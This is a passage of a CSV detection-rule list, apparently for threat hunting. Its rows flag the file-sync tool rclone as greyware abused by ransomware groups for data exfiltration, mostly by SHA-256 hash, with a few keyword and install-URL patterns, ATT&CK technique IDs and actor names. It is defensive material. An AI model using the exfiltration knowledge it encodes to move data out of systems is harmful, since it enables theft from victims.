services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fad3cc619183bbb7d6dce8589518a61f9f869a174d8b98da06a767374c2abffd*",".{0,1000}fad3cc619183bbb7d6dce8589518a61f9f869a174d8b98da06a767374c2abffd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fad42d5e34aab145ea9f1a1f6ecf034a0b40a1a7ad7b31be6f005d0c07e13657*",".{0,1000}fad42d5e34aab145ea9f1a1f6ecf034a0b40a1a7ad7b31be6f005d0c07e13657.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fad80718fa8c22e80365bf7d50ea9008f8afbf26b6c6d18d8d4a217eedf5b5ff*",".{0,1000}fad80718fa8c22e80365bf7d50ea9008f8afbf26b6c6d18d8d4a217eedf5b5ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fae6c0677a8dedaff4687729151773fb6ce36a738eb1e18957b4236830b8d3e1*",".{0,1000}fae6c0677a8dedaff4687729151773fb6ce36a738eb1e18957b4236830b8d3e1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*faf0cd20f1e4b41c20282c9dff56846dad7825496ec0405ba0295d084ae591e0*",".{0,1000}faf0cd20f1e4b41c20282c9dff56846dad7825496ec0405ba0295d084ae591e0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fb08b2b7c991ade4019a561f9bb75683b8d0daa45226efbc9937639775977203*",".{0,1000}fb08b2b7c991ade4019a561f9bb75683b8d0daa45226efbc9937639775977203.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fb247979bf026b6bd237c5db68af0de9269fcd921d8f2c2bc8920273a5a4a930*",".{0,1000}fb247979bf026b6bd237c5db68af0de9269fcd921d8f2c2bc8920273a5a4a930.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fb39edddedbacd66c0d7a4ebad767bf2a7c5a995c465c66eb32f1c64b25e20c4*",".{0,1000}fb39edddedbacd66c0d7a4ebad767bf2a7c5a995c465c66eb32f1c64b25e20c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fb616a4e84d740782560e7ab7ff8f05157a2302a5c273345a5cd83d5f5fead6a*",".{0,1000}fb616a4e84d740782560e7ab7ff8f05157a2302a5c273345a5cd83d5f5fead6a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fb7b8c3ce12ad16da65ad3f284d80ce4b80e2e7456da23b30b59266a9ed19e71*",".{0,1000}fb7b8c3ce12ad16da65ad3f284d80ce4b80e2e7456da23b30b59266a9ed19e71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fba5a24a43675925ac6a9ed3ce61aa854e843753daf54b160ed72350a7c2509f*",".{0,1000}fba5a24a43675925ac6a9ed3ce61aa854e843753daf54b160ed72350a7c2509f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fbde6de8ad4a5d7d939d7e93f915832fbf5721abe180fba6b000def37c717fa9*",".{0,1000}fbde6de8ad4a5d7d939d7e93f915832fbf5721abe180fba6b000def37c717fa9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fbef59f9d936742c9ec326dc55e9f1f2495771312efd7022f7d6ba84607cc74b*",".{0,1000}fbef59f9d936742c9ec326dc55e9f1f2495771312efd7022f7d6ba84607cc74b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fc2f1acb031b9d16788c04a7a2feb3fa220a05feecbe087cb97f92cd31a25955*",".{0,1000}fc2f1acb031b9d16788c04a7a2feb3fa220a05feecbe087cb97f92cd31a25955.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fc6bf98a11ffa69b91775c7613db1230803948949e4933892cb1d2fbd05cfcb8*",".{0,1000}fc6bf98a11ffa69b91775c7613db1230803948949e4933892cb1d2fbd05cfcb8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fcad4fac0cb1a82960c4228ab28725755b6241914469b7b34393c07bb86d1c2f*",".{0,1000}fcad4fac0cb1a82960c4228ab28725755b6241914469b7b34393c07bb86d1c2f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fcd13c6633ef3fc3702f56ba46c9ee515a166dfd0161ccd5c4cfd14856892bab*",".{0,1000}fcd13c6633ef3fc3702f56ba46c9ee515a166dfd0161ccd5c4cfd14856892bab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd194cf2b6edb6157d0033df52d5c5add9abd1b02683fac6edc74f6829812491*",".{0,1000}fd194cf2b6edb6157d0033df52d5c5add9abd1b02683fac6edc74f6829812491.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd2cb4581c2bd501355f938b46e14514aebb8053e5e10f99ff8782086634cc4d*",".{0,1000}fd2cb4581c2bd501355f938b46e14514aebb8053e5e10f99ff8782086634cc4d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd2d74fdf5e1fb90939c7b1902c0871aab404541f613978cfe3bb67e5da2b7f9*",".{0,1000}fd2d74fdf5e1fb90939c7b1902c0871aab404541f613978cfe3bb67e5da2b7f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd56c2b76845cce8098053bddc58974e61d72c17841b66e7b39e0d1e6bdfaad2*",".{0,1000}fd56c2b76845cce8098053bddc58974e61d72c17841b66e7b39e0d1e6bdfaad2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd6bc19cc7fadb13538cc109128bf92ef47762a83a3eaf2ab699b03bb2a1fe32*",".{0,1000}fd6bc19cc7fadb13538cc109128bf92ef47762a83a3eaf2ab699b03bb2a1fe32.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fd7daf7c06d1ddd7dac1b11235096d203b22f34f05c470b5737269767af289ab*",".{0,1000}fd7daf7c06d1ddd7dac1b11235096d203b22f34f05c470b5737269767af289ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fdfb4bf86d0f42baf4723b168ef1c768dbe9504003718418610c12bb12b43989*",".{0,1000}fdfb4bf86d0f42baf4723b168ef1c768dbe9504003718418610c12bb12b43989.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fe7e882c3398640429e9d56be1b45fabfea6829cc44609272411d07b0de24527*",".{0,1000}fe7e882c3398640429e9d56be1b45fabfea6829cc44609272411d07b0de24527.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fe84402f814f28cbdcf92696b5e28d738121e16fae5ca9b5fc43d7045311028c*",".{0,1000}fe84402f814f28cbdcf92696b5e28d738121e16fae5ca9b5fc43d7045311028c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fe8c6970ccddf7c7d1ee465118e07b9d42bc08d1a7888fd840baa2ee2e0cffe8*",".{0,1000}fe8c6970ccddf7c7d1ee465118e07b9d42bc08d1a7888fd840baa2ee2e0cffe8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ff3e998c3fbe9b0409706084db0627094e8bd971fcfc304d93a3105cc5a51426*",".{0,1000}ff3e998c3fbe9b0409706084db0627094e8bd971fcfc304d93a3105cc5a51426.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ff6ae27dadc4084ee2632a2ec29ac0662d19acba889943442d2a2cc578926fa6*",".{0,1000}ff6ae27dadc4084ee2632a2ec29ac0662d19acba889943442d2a2cc578926fa6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ffab140a79d06d88ec543509c59850b4b042d8730a6b5ea0c3f592cb20ac242f*",".{0,1000}ffab140a79d06d88ec543509c59850b4b042d8730a6b5ea0c3f592cb20ac242f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ffb178076c942e678405a4d77eefcfcb96b63802b240f2e4e92cde746cbf6d07*",".{0,1000}ffb178076c942e678405a4d77eefcfcb96b63802b240f2e4e92cde746cbf6d07.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ffbfdc45658000d2b762e5b8b0bc0418a4afffeda9a1f9bbcf7438a213ba5326*",".{0,1000}ffbfdc45658000d2b762e5b8b0bc0418a4afffeda9a1f9bbcf7438a213ba5326.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fff35786bf9ee9320037db69e239df83768b8f756bae2343253ba6512e70d86c*",".{0,1000}fff35786bf9ee9320037db69e239df83768b8f756bae2343253ba6512e70d86c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*file_hash_sha256*",".{0,1000}file_hash_sha256.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*from rclone import *",".{0,1000}from\srclone\simport\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - 
Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*https://rclone.org/install.sh*",".{0,1000}https\:\/\/rclone\.org\/install\.sh.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 